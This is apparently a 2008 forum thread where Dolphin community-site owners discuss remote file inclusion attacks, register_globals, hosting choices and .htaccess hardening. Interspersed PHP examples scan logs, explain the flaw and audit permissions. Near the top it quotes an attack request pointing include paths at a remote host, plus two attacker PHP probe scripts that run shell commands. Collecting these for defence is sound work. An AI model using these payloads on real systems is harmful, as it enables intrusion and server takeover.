I do SECOND AND THIRD your IMPORTANCE of BACKING UP your stuff. A few minutes, couple of times a week...PRICELESS!

Well it is definitely an embedded script on other site(s)

//ray/video/skins/index.php?sIncPath=http://www.yogyacardus.com/var/echo.txt??
  Http Code: 404 Date: Jul 12 21:45:09 Http Version: HTTP/1.1 Size in Bytes: -
  Referer: -
  Agent: libwww-perl/5.805

I'll see what I can discover...

Notes:

Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.7a DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fastcgi/2.4.6 Server at yogyacardus.com Port 80

<?
echo "ghareng<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "YogyaCardUS ONLINE<br>";
exit;
?>

Domain name: CDPM3.COM

<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
-------------------------------------------------

Thailand...Figures. As far as I can tell they are definitely exposing the passthru functions. These are the last 2 sites and attacks I took and the code they produce via their site to try to take over my Dolphin. Basically trying to override the Admin credentials providing access to site ADMIN.

I believe my Globals On is defeating this attack. Why? I don't know yet but it is the only thing I have configured for a very specific reason on my plat. Because Globals was such an issue in the old ways the new ways dramatically approach globals entirely new. So over the last year I have tested its new way per se and am currently impressed but...

The attacks are definitely focused on the Unity Family of Communities...And since I am not affected I am reluctant to find a solution...However curious as to why I am not affected in the Web2.0 with Globals On?

To be continued...Off to Apache and PHP see what I can find out...

-------------------------------------------

Well this is a sweeping NET attack not BoonEx specific but certain SERVER platform configuration will be at risk. The hacks on Dolphin are more annoyances but this is ultimately the type site(s) they are after http://www.goerie.com/apps/pbcs.dll/article?AID=/20080630/NEWS07/806300452/-1/NEWS

After reviewing my Log File I gathered a list of contributing sites to this hack although I am sure there are thousands more:

I am sure most ServerFarms will have this isolated in a few days/weeks? possibly.
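As an added example, not code from the post above or from Dolphin, here is a PHP scanner for Apache access logs that picks out requests of the kind quoted above (a URL in a query parameter, including the dir[plugins] array form); the log lines, hosts and addresses in it are constructed placeholders.

```php
<?php
// Added example, not Dolphin code: a scanner for Apache access logs that
// flags the include-injection requests the post above found in its 404 log,
// i.e. any query parameter whose value is a URL or a PHP stream wrapper.
// parse_str() is used so that array-style parameters such as the
// dir[plugins]=... form are walked as well. The log lines are constructed
// in combined format for the demo; hosts and addresses are placeholders.

// Walk a parsed parameter tree; record every leaf that names a remote or
// wrapper source under its full parameter name (e.g. "dir[plugins]").
function collect_remote_values($value, $name, &$hits)
{
    if (is_array($value)) {
        foreach ($value as $k => $v) {
            collect_remote_values($v, $name === '' ? (string) $k : $name . '[' . $k . ']', $hits);
        }
        return;
    }
    if (preg_match('#^\s*(?:(?:https?|ftps?|php|phar|expect)://|data:)#i', $value)) {
        $hits[$name] = $value;
    }
}

// One combined-format line -> finding array, or null when nothing is wrong.
// Status is kept because 404/403 here means the attempt failed (the file or
// .htaccess denied it) while 200 would mean the include path was reachable.
function scan_log_line($line)
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"/';
    if (!preg_match($re, $line, $m)) {
        return null;                                  // not a combined-format line
    }
    list(, $ip, $time, $method, $target, $status, $agent) = $m;
    $query = parse_url($target, PHP_URL_QUERY);
    if ($query === null || $query === false) {
        return null;                                  // no query string at all
    }
    $params = array();
    parse_str($query, $params);
    $hits = array();
    collect_remote_values($params, '', $hits);
    if (!$hits) {
        return null;
    }
    return array(
        'ip'     => $ip,
        'time'   => $time,
        'method' => $method,
        'path'   => parse_url($target, PHP_URL_PATH),
        'status' => (int) $status,
        'agent'  => $agent,
        'params' => $hits,
    );
}

// Scan many lines; returns only the findings, in log order.
function scan_log($lines)
{
    $findings = array();
    foreach ($lines as $line) {
        $f = scan_log_line($line);
        if ($f !== null) {
            $findings[] = $f;
        }
    }
    return $findings;
}

// Constructed sample: two attempts shaped like the ones in the thread (the
// sIncPath and dir[plugins] forms), one ordinary request, one junk line.
$SAMPLE_LOG = array(
    '203.0.113.7 - - [12/Jul/2008:21:45:09 -0500] "GET /ray/video/skins/index.php?sIncPath=http://remote.example/var/echo.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805"',
    '203.0.113.7 - - [12/Jul/2008:21:45:10 -0500] "GET /plugins/safehtml/HTMLSax3.php?dir[plugins]=http://remote.example/c99in.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.805"',
    '198.51.100.4 - - [12/Jul/2008:21:46:01 -0500] "GET /index.php?id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    'this line is not a log entry',
);

if (PHP_SAPI === 'cli') {
    // Pass a real access log as the first argument; otherwise the sample runs.
    $lines = isset($argv[1]) ? file($argv[1]) : $SAMPLE_LOG;
    foreach (scan_log($lines) as $f) {
        foreach ($f['params'] as $name => $value) {
            printf("%s %s %s %d %s=%s agent=%s\n",
                   $f['time'], $f['ip'], $f['path'], $f['status'], $name, $value, $f['agent']);
        }
    }
}
```

On the sample the first two lines are reported (parameters sIncPath and dir[plugins]) and the other two are ignored; a 200 status on a reported line is the one that warrants checking the file system.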

13 Jul 2008

Hi,

Just to add a little bit of info here. I have seen these so called hacker sites for a few years now. If any of you ever wonder why they never get shut down it is because these are supposed to be legitimate security sites that address security holes in popular software.

I have not looked into it but I'm told they have sections that explain how to fix holes and how to increase the security of your site.

Apparently all they want to do is make the web a safer place. The fact that hackers then use the site to exploit the holes in the software is a side effect that no one wants.

But, with that said, the point of doing what they did is to force the software developers to fix the issue. So can Boonex fix this hole? Is it going to happen?

I don't necessarily agree with how the site operators work.... But at least in this instance we hope that Boonex will take note and fix the problems.

In their Blog, boonex are now asking people to submit recommendations for their next version of Dolphin. Perhaps if everyone went over there and submitted a request for "a more secure version of Dolphin, maybe with less bells and whistles, but less likely to get hacked" we might get them to actually build a new version with some of the security holes closed.

http://www.boonex.com/unity/blog/entry/Dolphin_6_2_Ray_3_6_Orca_2_1_Now_In_Works

Cheers

Max

13 Jul 2008

i am at globat. they suspended my account for spamming...and they reactivated it... i deleted the htmlsax3....and i tried to set up my htaccess. i asked them if they support htaccess. they said only in folders with permissions 755. so what i did is to change my folders' permissions from 777 to 755. what now?  will there be any problem with this?

13 Jul 2008

Hi,

Just to add a little bit of info here. I have seen these so called hacker sites for a few years now. If any of you ever wonder why they never get shut down it is because these are supposed to be legitimate security sites that address security holes in popular software.

I have not looked into it but I'm told they have sections that explain how to fix holes and how to increase the security of your site.

Apparently all they want to do is make the web a safer place. The fact that hackers then use the site to exploit the holes in the software is a side effect that no one wants.

But, with that said, the point of doing what they did is to force the software developers to fix the issue. So can Boonex fix this hole? Is it going to happen?

I don't necessarily agree with how the site operators work.... But at least in this instance we hope that Boonex will take note and fix the problems.

In their Blog, boonex are now asking people to submit recommendations for their next version of Dolphin. Perhaps if everyone went over there and submitted a request for "a more secure version of Dolphin, maybe with less bells and whistles, but less likely to get hacked" we might get them to actually build a new version with some of the security holes closed.

http://www.boonex.com/unity/blog/entry/Dolphin_6_2_Ray_3_6_Orca_2_1_Now_In_Works

Cheers

Max

avhow,

just to touch on some of your concerns and remarks regarding the dolphin scripts security. it would really not matter what boonex does from the development standpoint, if the user who installs this does not comply with certain requirements for operating the site. my main point here is this. with register_globals=on, the site is open to exploits such as this RFI. there is nothing wrong with writing a program that does remote file inclusions, that is how most all dynamic sites work, that is done for many reasons, but that is not the topic of discussion here. so if you know you need certain requirements to run the dolphin script, and you opt to go another route, then you are putting yourself in harm's way.

i wish more would pay attention to what needs to be done to run this script successfully, and there would be far less complaints about any of this. but we as a community can get through this, and eventually it will go away.

avhow, this basically reminds me of locking all your doors but leaving your windows wide open. DUH, if the burglar comes, he is going to get in. and remember, a lock don't stop a thief, only keeps an honest man honest. so no matter what boonex or any other developer does for security, there is always going to be something that is going to be tried by these people who have nothing better to do with their time.

later,

DosDawg

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
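To make the register_globals point above concrete, here is an added example (not Dolphin's or BoonEx's code) of the include pattern that an unassigned $sIncPath exposes, beside three defences a PHP application can apply; file and constant names in it are assumed, and only the request shape comes from the thread.

```php
<?php
// Added example, not Dolphin or BoonEx code: how register_globals=On turns an
// include path that a file never assigns into a remote file inclusion, and
// three defences a PHP application can apply. File and constant names are
// assumed; only the request shape (?sIncPath=http://...) comes from the thread.

// --- the shape of the problem -----------------------------------------------
// An inc file that relies on its caller having already set $sIncPath:
//
//     include($sIncPath . 'functions.inc.php');      // VULNERABLE
//
// Requested directly, $sIncPath is undefined. With register_globals=On, PHP
// creates it from the query string, so ?sIncPath=http://host/x.txt? makes
// include() fetch and run remote code (allow_url_fopen permitting; the
// trailing "?" turns the appended file name into a harmless query on the
// remote server). With register_globals=Off the same request leaves
// $sIncPath undefined and include() only looks for a local functions.inc.php.

// --- defence 1: derive include paths from the file's own location, never from
// a variable that request data could populate --------------------------------
function local_inc_path()
{
    return dirname(__FILE__) . '/';
}

// --- defence 2: when a path must come from a variable, validate it ------------
// True only for an existing path that resolves inside $baseDir; rejects URLs,
// stream wrappers (php://, data:) and ../ escapes.
function is_safe_inc_path($sIncPath, $baseDir)
{
    if (!is_string($sIncPath) || $sIncPath === '') {
        return false;
    }
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $sIncPath)) {
        return false;                        // scheme present: http:, php:, data:
    }
    $real = realpath($sIncPath);
    $base = realpath($baseDir);
    if ($real === false || $base === false) {
        return false;                        // missing or unresolvable path
    }
    return $real === $base
        || strpos($real, rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR) === 0;
}

// --- defence 3: undo register_globals at the entry point ----------------------
// In the spirit of the Joomla globals.php mentioned later in the thread: before
// any other code runs, remove from the global scope every variable that could
// only have arrived through a request superglobal. Returns the number removed.
function unregister_globals()
{
    if (!ini_get('register_globals')) {
        return 0;                            // nothing was injected
    }
    $keep = array('GLOBALS' => 1, '_GET' => 1, '_POST' => 1, '_COOKIE' => 1,
                  '_FILES' => 1, '_SERVER' => 1, '_ENV' => 1, '_REQUEST' => 1,
                  '_SESSION' => 1);
    $removed = 0;
    foreach (array($_GET, $_POST, $_COOKIE, $_FILES, $_SERVER, $_ENV) as $source) {
        foreach (array_keys($source) as $key) {
            if (!isset($keep[$key]) && array_key_exists($key, $GLOBALS)) {
                unset($GLOBALS[$key]);
                $removed++;
            }
        }
    }
    return $removed;
}

// Usage: first lines of the front controller, before any include
//     unregister_globals();
//     define('APP_LOADED', true);           // constant name assumed
// and the first line of every inc file, so a direct request does nothing:
//     if (!defined('APP_LOADED')) { header('HTTP/1.0 403 Forbidden'); exit; }
```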
13 Jul 2008

Hi,


I see your point. What that means then is basically the hackers are telling the world that a certain exploit exists BUT if the Dolphin users had only used a host with the Register_Globals Off then they would not be affected.

So basically anyone who has had their site hacked should take notice that they are using a host that has Register_Globals On and is therefore lacking in security.

In my mind the solution to this would be for Boonex to put more emphasis on that in the Installation recommendations (I know they already mention it but it is bunched in with all the other specs). They should tell people that it is EXTREMELY important to make sure those settings are Off for the security of the site.

Then instead of recommending a single host (that is known to have lax security from what I have been told on these forums) they should recommend a few more hosts that have known good security.

Thanks for your info. Dos Dawg.

Cheers

Max

13 Jul 2008

Sooo,,,,for a week now I've continued to be hacked each and every day.  I've had to replace my index.php a few times, and of course the ray/modules/globals/inc/content.inc.php a few times.

I also have had strange files show up in my root....one of them is scan.php?  When run this opens up my site in a c99 shell format.  I'm just totally screwed with my HOST ....

My HOST is a paid Yahoo hosting plan.  They said, they are sorry but since this is a shared server they cannot do anything but I could suggest this with their Engineers as a possible suggestion to consider.

I take it I'm supposed to delete this scan.php? file.  It is written by a group called:  w4cking-shell(Private Build v.0.3). This of course comes from https://w4ck1ng.com/ site.

I've continued to delete files from the TMP folder also that look very strange.  Along with other strange files.  Looks like I am just going to have to SWITCH HOSTS after all.  It's too bad as my site has really taken off and the few hundred customers really like the Dolphin script.  But I just don't have the time to keep up with this type of activity.

Ok, back to deleting strange files.....

DoLaugh 

13 Jul 2008

I was also hacked twice, I was lucky in the fact that my site hadn't launched.  After the hack and reading this and other forum threads on this subject I am now trying to figure out the best way to proceed.  I am not an expert and in fact have hired out most of the install and update work on my site.  Here are the two things I am pondering now any input and comments will be helpful.

1.  From what I can tell this hacking seems to be a bigger issue with 6.1. Is it smarter, safer to return to 6.0?

2.  The other issue seems to be a hosting issue.  I would love to see a list or get some input on where you are hosting if you got hacked or not.

Thanks For your help & Input!

texaseagle

13 Jul 2008

I make it a rule to never post my site's URL on any forum for help .... that includes Dolphin, phpBB2, Coppermine, SMF etc.

My site is running under Free License (still has Dolphin links) with Register_Globals off.

I have not been hacked. Running V6.1.1.

Is there an official fix for this yet?

My site was hacked right after I registered it and paid the license fee.  My site had no links to it and I was still testing it before I launched it.

I have several other free dolphin sites unregistered and I have had no problems with them.

The hackers must be pulling the urls off of unity/boonex.

13 Jul 2008

Hi,


I see your point. What that means then is basically the hackers are telling the world that a certain exploit exists BUT if the Dolphin users had only used a host with the Register_Globals Off then they would not be affected.

So basically anyone who has had their site hacked should take notice that they are using a host that has Register_Globals On and is therefore lacking in security.

In my mind the solution to this would be for Boonex to put more emphasis on that in the Installation recommendations (I know they already mention it but it is bunched in with all the other specs). They should tell people that it is EXTREMELY important to make sure those settings are Off for the security of the site.

Then instead of recommending a single host (that is known to have lax security from what I have been told on these forums) they should recommend a few more hosts that have known good security.

Thanks for your info. Dos Dawg.

Cheers

Max

avhow,

i think what should have been done is that yes dolphin should warn against being on a server with register_globals on, but this is also something that the hosts that are turning it on should warn about, moreso than the developer should warn about turning it off, since after php4.2 they were off by default, so they are intentionally turned on. so when you develop a script according to standards of other software releases, you would presume that other services involved such as hosting providers, would follow those guidelines or have it written in their agreement or TOS that they have opted against industry standards, and outline what measures should be taken to maintain a safe hosting environment.

later,
DosDawg

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
13 Jul 2008

Hi,

Texaseagle - so far I haven't been hacked (fingers crossed) and I am on a host with Register_Globals Off. They are - Hostmonster.

Many people on this forum have recommended good hosts in the past. Search for Host and you'll see many posts.

To be honest I have always toyed between using Dolphin/Orca and PhpBB. Dolphin wins out because the Paypal subscription thing is built in. Currently in PhpBB3 there is no subscription mod.

BUT where phpbb does win is in their support set-up in particular their comprehensive list of recommended hosts - http://www.phpbb.com/hosting/

I'd like to see Boonex set up a list of recommended hosts rather than just pushing Host For Web who many people have had problems with (myself included).

Cheers

Max

14 Jul 2008

avhow, this basically reminds me of locking all your doors but leaving your windows wide open. DUH, if the burglar comes, he is going to get in. and remember, a lock don't stop a thief, only keeps an honest man honest. so no matter what boonex or any other developer does for security, there is always going to be something that is going to be tried by these people who have nothing better to do with their time.

later,

DosDawg

I think your analogy seems a bit simplistic really.  Where for example in your analogy is the issue of whether window manufacturers could improve their quality control, and build in better mechanisms (which are already available to them) so that the windows can't be opened from the outside, whether they are locked or not - thereby protecting their customers from any issue of forgetting to lock a window?  But yes, of course, it would be easier in the long run to ignore the existence of such a mechanism, and instead simply tell people they should lock their windows, and if you forget, bad luck.

I do hate to quote myself, but, as I mentioned, php.net seem to think there is nothing wrong with RG if the scripting is done securely:

http://www.php.net/register_globals

... and I quote from that page, paragraph 1 "... keep in mind that the directive itself isn't insecure but rather it's the misuse of it."

Now if I am missing something here - and there really is something in the Dolphin code that can not possibly be done another way, making it safe with RG on, please feel free to explain it, as technically as necessary.  I assure you I will appreciate it.

14 Jul 2008

I noticed a couple things:

1st.  Someone mentioned that the database login and password are written in the header.inc.php

I checked and that is true.  Matter of fact I found that most folders do not have index files and anyone can url to a folder and see the contents.  You could even download the header.inc file and view the source code.

2nd my host recommends changing folders to 660 permission

3rd  Having the correct htaccess file would be of help.  No htaccess file came with the dolphin download

4th most attacks seem to be entering through the ray modules global inc folder

5th  hackers may be pulling url addresses for dolphin owners from unity

6th I found a list of hacker ips on the net.  I blocked the majority of them especially from asia

http://www.dvdriot.com/secure/index.html

14 Jul 2008

Is it still a problem, also with 6.1? :/

14 Jul 2008

You can find a good blocklist from this site:
http://www.wizcrafts.net

On the left column find Htaccess Blocklists. Then you will have the option of Chinese, exploited servers, Nigerian, and Russian.
http://www.wizcrafts.net/chinese-blocklist.html
http://www.wizcrafts.net/exploited-servers-blocklist.html
http://www.wizcrafts.net/nigerian-blocklist.html
http://www.wizcrafts.net/russian-blocklist.html

I don't make them or know for certain what makes this site's list. They are all updated regularly.

By adding them all you will most likely block a few that are not causing issues. So this is not a perfect solution either. Also make sure your server's IP doesn't fall in any of the ranges or you'll block yourself or your site.

For example you can block a whole range 1.0.0.0-1.255.255.255 by
deny from 1.0.0.0/8 but that is going to block a whole ton of IPs.

It's not going to make your problem disappear, but it is a good site/list to follow. I think you could block IPs all day long in this case, they just keep changing. So it will temporarily block someone, but I don't think it does a whole lot of good. The minute you block one, it just changes.

If you have index browsing on then yes they can browse your files and folders. Even if someone happened to download your header it will most likely be blank. Try it. Many scripts have the database connection in there somewhere whether it be a header file or config file or similar. Even if you had Options -Indexes in your .htaccess I could still create a hyperlink to yoursite.com/location of header which we all know and download it, but what I will get is a blank document/file.

I wouldn't be surprised if they are pulling addresses from here, google, yahoo, or anywhere else they might be published. I have non-dolphin sites that are taking a ton of hits from this that are all over google and other search engines.

All I can say is hang in there, keep an eye on files and folders as much as possible. Keep your site and database backed up regularly.

Safehtml is used by plenty of other scripts besides dolphin. I am wondering if anyone running another script that uses this if you are seeing a bunch of hits on your other script as well? Or if dolphin sites seem to be the big target.

Same with other forums and message boards at other sites that use this. Are they seeing anything similar.

DialMe.com - Your One and Only Source For Boonex Dolphin Tutorials and Resources
14 Jul 2008

ken707,

The hacks are indeed half the time coming through ray, but Safehtml is another source of the hacks, I do not know enough about code to tell how but it seems that currently it is doing the opposite of what it was designed for.  Anywho, I got fed up with my shared server, and its crew of finger pointers at IX webhosting.  I am switching over to DosDawg's hosting as he has been the only source of help I received.

Thanks,

Roy

14 Jul 2008

If memory serves me correctly ... (I'm old) ... but Joomla experienced this Global on, Global off issue a while back and implemented a globals.php file that emulates the globals off for all joomla ... this for the most part corrected this issue. 

My dolphin test site was hacked and my paid account is still locked by my host provider ... I agree having total control over your own server helps stop the attacks.  I went with a host provider, my mistake ... Boonex/Dolphin needs to improve their security before implementing any new changes.... just my thought?

I was migrating from joomla to dolphin because of the appearance organized ease  ... not my KNOW HOW! In programming.  

Boonex offers a great package with a sense of real quality.  I'm new to dolphin but I see a: soon to be really great CMS going through some really nasty growing pains.

Good luck …… I still think it's worth waiting for the next security patch…

14 Jul 2008

http://www.php.net/register_globals

... and I quote from that page, paragraph 1 "... keep in mind that the directive itself isn't insecure but rather it's the misuse of it."

Now if I am missing something here - and there really is something in the Dolphin code that can not possibly be done another way, making it safe with RG on, please feel free to explain it, as technically as necessary.  I assure you I will appreciate it.

you quote that from php.net but you didnt quote the warning above nor the whole 2 paragraphs

Warning

This feature has been DEPRECATED and REMOVED as of PHP 6.0.0. Relying on this feature is highly discouraged.

Highly Discouraged is telling you something is it not? php.net are in effect telling all shared hosting companies not to turn register globals on

you also quoted the last line of paragraph 1

but keep in mind that the directive itself isn't insecure but rather it's the misuse of it.

this is a bit like saying, the door is locked but we left an Axe around if you look.

But look at the 1st line of the 2nd paragraph and here is what you fail to see.

When on, register_globals will inject your scripts with all sorts of variables

this means you have provided the tools on the server for the hackers to use to inject your sites with their code

if it is that secure, why the need to drop register globals all together in php 6?

the misuse of it is by shared hosting providers. they turn it on when its been installed with the default setting of OFF

It seems you are missing my point completely.  I am not advocating that register_globals should not be turned off.

The point is, why would developers not allow for the fact that not everybody understands things like RG or htaccess files, or has their own dedicated server (and knows how to configure it) and so on.

Register Globals in itself is not insecure.  It becomes insecure when - and only when - there is insecure code.  Hackers can't do anything with RG alone - they need to find a script that has been insecurely written, and then they can use RG if it is on, to exploit that script.  Only the developers can solve the problem properly - by closing the holes in the script.

To put it another way - imagine you write a script and someone informs you that there is a security flaw in it which makes it vulnerable on servers where Register_Globals is enabled.  Which is the better course of action:

1.) Fix the problem, so it is safe even on servers with RG enabled.

2.) Adopt a position of I don't care, if people are stupid enough to have RG on, they deserve to be hacked.

I hope that explains the issue better.

There is also a major issue here that is being somewhat forgotten I fear in the drama over RG.  That is the folders with 777 permissions, by default after a fresh installation of the script.  This is necessary in a script that has things such as user upload of files involved.  But, while there has been discussion in this thread about how one can protect those folders with correct htaccess settings, Dolphin does not include those htaccess settings in the installation.  Why not? Surely that is a simple thing to do.  If there's a legitimate reason, why not let us know.

Also, I do want to say, because I'm sure plenty of people will be assuming otherwise, that I am not here to attack Boonex and cause trouble.  I really like the Dolphin Suite of products, and want to involve myself in them for a long time to come (if I didn't I would have just moved on rather than bothering with this bashing of my head against what increasingly appears to be a brick wall).  I am simply suggesting improvements by allowing for contingencies, such as users who do not know what a global variable is, or an .htaccess file, let alone how to install or configure mod_security for example.

And, I guess, to be honest, bandaid 'solutions' are a pet peeve of mine, and that's how I see the common misconception that Register_Globals is the root of all evil and simply turning it off is the cure-all wonder drug to fix the problem.  It isn't.  The real solution is to solve problems In The Code.
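An added example, not Dolphin's or BoonEx's own code, that audits an installation for the two points raised above: world-writable (777) directories that carry no .htaccess of their own, and the PHP settings behind the inclusion attacks; the install path and the .htaccess content are assumed, and on suPHP hosts (as the next post's host explains) the settings it flags must be changed in a php.ini rather than with php_flag.

```php
<?php
// Added example, not Dolphin or BoonEx code: a command-line audit for the two
// points raised above, world-writable directories (the 777 defaults) that have
// no .htaccess of their own, and the PHP settings behind the inclusion attacks.
// Run as  php audit.php /path/to/dolphin  (the path is a placeholder). On suPHP
// hosts php_flag in .htaccess is ignored, so settings flagged here have to be
// changed in a php.ini in the account (or by the host) instead.

// Recursively list directories under $root that anyone on the box can write
// to. Each finding notes the mode, whether the directory carries its own
// .htaccess, and how many .php files already sit in it (code where only
// uploads should be is the sign the thread's posters kept finding).
function audit_writable_dirs($root, &$findings = array())
{
    $entries = @scandir($root);
    if ($entries === false) {
        return $findings;                               // unreadable: skip it
    }
    foreach ($entries as $entry) {
        if ($entry === '.' || $entry === '..') {
            continue;
        }
        $path = rtrim($root, '/') . '/' . $entry;
        if (is_link($path) || !is_dir($path)) {
            continue;
        }
        $mode = fileperms($path) & 0777;
        if ($mode & 0002) {                             // world-writable bit
            $php = glob($path . '/*.php');
            $findings[] = array(
                'dir'       => $path,
                'mode'      => sprintf('%04o', $mode),
                'htaccess'  => file_exists($path . '/.htaccess'),
                'php_files' => is_array($php) ? count($php) : 0,
            );
        }
        audit_writable_dirs($path, $findings);
    }
    return $findings;
}

// PHP directives that should be Off for this class of attack. ini_get()
// returns false for a directive this PHP build does not know, which counts
// as Off. allow_url_include (PHP 5.2+) is the one that gates include() of a
// URL; allow_url_fopen gated it on older builds and may be needed by other
// features, so treat a hit on it as something to confirm rather than flip.
function audit_php_settings()
{
    $report = array();
    foreach (array('register_globals', 'allow_url_include', 'allow_url_fopen', 'display_errors') as $name) {
        $value = ini_get($name);
        $on = $value !== false && $value !== '' && $value !== '0' && strtolower($value) !== 'off';
        $report[$name] = array('value' => $value === false ? '(absent)' : $value, 'ok' => !$on);
    }
    return $report;
}

// Suggested .htaccess for each writable upload directory (assumed content,
// adjust to the host): never execute scripts stored there, never list it.
$UPLOAD_DIR_HTACCESS = "<FilesMatch \"\\.(php|phtml|php3|php4|php5|inc)\$\">\n"
                     . "    Order allow,deny\n"
                     . "    Deny from all\n"
                     . "</FilesMatch>\n"
                     . "Options -Indexes\n";

if (PHP_SAPI === 'cli' && isset($argv[1])) {
    foreach (audit_php_settings() as $name => $r) {
        printf("%-18s %-8s %s\n", $name, $r['value'], $r['ok'] ? 'ok' : 'SHOULD BE Off');
    }
    foreach (audit_writable_dirs($argv[1]) as $f) {
        printf("%s mode %s .htaccess:%s php files:%d\n", $f['dir'], $f['mode'],
               $f['htaccess'] ? 'yes' : 'NO', $f['php_files']);
    }
}
```

A writable directory reported with ".htaccess:NO" and a non-zero php file count is the case to look at first; dropping $UPLOAD_DIR_HTACCESS into it stops anything already there from being served as code.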

14 Jul 2008

This is the message I received from a Linux System Administrator in Hostgator this morning :

"You will not be able to use php_flag in .htaccess on our servers as we use suPHP. You instead need to use a php.ini file in your home directory. Would you like me to create one based on the server's configuration for you in your home directory?"

At the same time I was also informed that viruses had been introduced into my ray folders in two different domains hosted with Hostgator. This is another new kind of attack, I think :

"/home/mokhsein/public_html/ecovoiceonline/ray/modules/global/inc/errors.php: HG-PHP.errors.php.MD5.AA FOUND

/home/mokhsein/public_html/shashamedia/ray/modules/global/inc/functions.php: HG-PHPSHELL.c99.Fragment.AB FOUND

----------- SCAN SUMMARY -----------
Known viruses: 380695
Engine version: devel-20080603
Scanned directories: 14221
Scanned files: 35309
Infected files: 2
Data scanned: 751.20 MB
Time: 226.821 sec (3 m 46 s)"

 





14 Jul 2008

They have been going at it all day. I have tried a few things but it only serves as a temporary break in their attack. This attack is definitely focused on Dolphin as I have other sites on the server(s) that are not affected at all. I do believe RG-on or off is a personal Server Administrative preference as of Apache2.0 but don't recommend it if you're not comfortable with direct server management.

My sites are not affected D6.1.2. Although they are continually rerouting the same lame attack at the site(s), they continually fail.

Proven Hosting -- Well that's a matter of who, what, how. All hosting business models partner with Farms or Resellers of Farms (13 major world-wide, better known as the NET). Over the last 5 years a handful of MicroFarms have popped up on the NET, GoDaddy being the largest one but a mere speck in comparison to The Planet server power (at least in North America).

When developing Reseller Hosting, which is what all hosters within BoonEx including myself are doing... we are limited to our own knowledge of Server Administration and Configuration. If we need help we have 2 choices. Solve the problem yourself or pay an excessive amount of money for Farm Engineer/Software help, which most of us Open Source Freaks will never pay the MAN for. We'll just figure it out!!! What types of fees, you ask? $150.00 to $250.00 per hour with a 3-5 hour min. And all of you want $1.99 hosting...

If you're running an Apache2.0 server your help/support (FREE) window has decreased greatly as most ServerFarms are running Apache1.3.3. As of Dec 07 Apache and PHP stopped supporting their old versions and forced Farms and Hosters to begin the transition into Apache2.0 and PHP5. Over the past 12 months several people within the BoonEx community have adopted the Apache2.0 Web Server and have far fewer issues with Dolphin. However, being wise to all that is Server Administration, building too fast could have awful consequences down the road. The Community Wide Hack is an example of this.

I too jumped out quick just to find some Hardware as well as "Hosting Support" issues rising up... A little bad luck and bam, I was down but not out. This time I return better understanding the Apache, PHP, and cPanel way, which is more important to Hosting than Dolphin. BUT DOLPHIN as a showcase to this new advanced web serving platform is a BIG SHINY DIAMOND of scripting fun and will replace CMS... shortly. I also like to mirror the Boonex.us community platform :)

I have followed The Planet as a barometer to how the NA industry is moving along. Over the past 8 months I have seen a drastic reduction in Hardware cost as well as more "general support" wanting to help on my Web2.0 server, where 8 months ago it was an immediate no and that will cost....

So no matter who you choose to host your Dolphin Community, asking some questions and being better informed to the actual process of hosting might help some of you in here find your way. Paying a little more might also be wise. Bottom line: managing a Dolphin Community is not Server Management. So if you're not comfortable with Server Side processes please find a Host or Administrator who is comfortable with it so you can focus more on the Community Management. If your SERVER (Dedicated/VPS/or Shared) is configured properly Dolphin works wonderfully, enough so I recommend it for Commercial deployment all the time. However I inform the Business or Individual as to the importance of Server Administration with this Dolphin software. Most scoff at the cost but they also think Ebay/MySpace/FaceBook are running on a single server, maybe a few... lol

Is this helpful for some or not? Vote :)

 

 

14 Jul 2008

http://www.boonex.com/unity/blog/entry/IMPORTANT_Security_Alert_

14 Jul 2008

http://www.boonex.com/unity/blog/entry/IMPORTANT_Security_Alert_

Great news - thanks.

14 Jul 2008

There was an earlier post by DosDawg that suggested the setting php_flag register_globals 0

Please address the difference between php_flag register_globals 0 and php_flag register_globals off.

All other posts have referred to "php_flag register_globals off". This includes the post from Dolphin.

Which is the proper code for security protection on Dolphin?

Thank you.

Arthur

15 Jul 2008

Thanks Sammie. Upon checking, I find that register_globals is turned off on my servers. You are correct, they are dedicated. The entries in .htaccess are therefore redundant.

This may be useful info for some.

; - register_globals = Off         [Security, Performance]
;     Global variables are no longer registered for input data (POST, GET, cookies,
;     environment and other server variables).  Instead of using $foo, you must use
;     you can use $_REQUEST["foo"] (includes any variable that arrives through the
;     request, namely, POST, GET and cookie variables), or use one of the specific
;     $_GET["foo"], $_POST["foo"], $_COOKIE["foo"] or $_FILES["foo"], depending
;     on where the input originates.  Also, you can look at the
;     import_request_variables() function.
;     Note that register_globals is going to be depracated (i.e., turned off by
;     default) in the next version of PHP, because it often leads to security bugs.
;     Read http://php.net/manual/en/security.registerglobals.php for further
;     information.

15 Jul 2008

